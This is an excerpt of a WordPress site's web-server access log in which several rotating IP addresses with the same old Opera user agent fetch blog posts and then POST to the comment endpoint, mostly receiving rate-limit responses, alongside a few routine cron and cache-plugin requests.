185.220.101.26 - - [29/Mar/2025:20:18:18 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:19 -0400] "GET /craft-weed-strains-in-canada-for-2024 HTTP/1.1" 301 0 "https://grimslut.com/craft-weed-strains-in-canada-for-2024" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:19 -0400] "GET /craft-weed-strains-in-canada-for-2024/ HTTP/1.1" 200 15667 "https://grimslut.com/craft-weed-strains-in-canada-for-2024" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.26 - - [29/Mar/2025:20:18:20 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:21 -0400] "GET /crafting-memorable-experiences-through-corporate-event-entertainment HTTP/1.1" 301 0 "https://grimslut.com/crafting-memorable-experiences-through-corporate-event-entertainment" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:21 -0400] "GET /crafting-memorable-experiences-through-corporate-event-entertainment/ HTTP/1.1" 200 15725 "https://grimslut.com/crafting-memorable-experiences-through-corporate-event-entertainment" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:23 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:24 -0400] "GET /culture-gift-certificate-discounts HTTP/1.1" 301 0 "https://grimslut.com/culture-gift-certificate-discounts" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:24 -0400] "GET /culture-gift-certificate-discounts/ HTTP/1.1" 200 15166 "https://grimslut.com/culture-gift-certificate-discounts" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:26 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:27 -0400] "GET /culture-gift-certificate-discounts/ HTTP/1.1" 200 15166 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:28 -0400] "GET /die-bedeutung-von-kommunikation HTTP/1.1" 301 0 "https://grimslut.com/die-bedeutung-von-kommunikation" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:28 -0400] "GET /die-bedeutung-von-kommunikation/ HTTP/1.1" 200 15500 "https://grimslut.com/die-bedeutung-von-kommunikation" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.174 - - [29/Mar/2025:20:18:30 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.63 - - [29/Mar/2025:20:18:30 -0400] "GET /die-magische-welt-der-kindergeschichten HTTP/1.1" 301 0 "https://grimslut.com/die-magische-welt-der-kindergeschichten" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
185.220.101.63 - - [29/Mar/2025:20:18:31 -0400] "GET /die-magische-welt-der-kindergeschichten/ HTTP/1.1" 200 15671 "https://grimslut.com/die-magische-welt-der-kindergeschichten" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
198.54.114.83 - - [29/Mar/2025:20:18:32 -0400] "POST /wp-cron.php?doing_wp_cron=1743293912.6532249450683593750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://grimslut.com"
185.220.101.63 - - [29/Mar/2025:20:18:32 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
198.54.114.83 - - [29/Mar/2025:20:18:33 -0400] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=0BKXb5sHWjCBFplu69fa7Zd7AuihCVsQ&litespeed_type=imgoptm HTTP/1.1" 200 5 "-" "WordPress/6.7.2; https://grimslut.com"
192.42.116.197 - - [29/Mar/2025:20:18:34 -0400] "GET /discover-the-essence-of-bld-market HTTP/1.1" 301 0 "https://grimslut.com/discover-the-essence-of-bld-market" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.197 - - [29/Mar/2025:20:18:34 -0400] "GET /discover-the-essence-of-bld-market/ HTTP/1.1" 200 15548 "https://grimslut.com/discover-the-essence-of-bld-market" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.197 - - [29/Mar/2025:20:18:35 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.197 - - [29/Mar/2025:20:18:36 -0400] "GET /discovering-suwons-business-trip-massage-services HTTP/1.1" 301 0 "https://grimslut.com/discovering-suwons-business-trip-massage-services" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.197 - - [29/Mar/2025:20:18:36 -0400] "GET /discovering-suwons-business-trip-massage-services/ HTTP/1.1" 200 15297 "https://grimslut.com/discovering-suwons-business-trip-massage-services" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
192.42.116.197 - - [29/Mar/2025:20:18:38 -0400] "POST /wp-comments-post.php HTTP/1.1" 429 983 "https://grimslut.com/wp-comments-post.php" "Opera/9.80 (Windows NT 6.1; MRA 6.0 (build 6083)) Presto/2.12.388 Version/12.17"
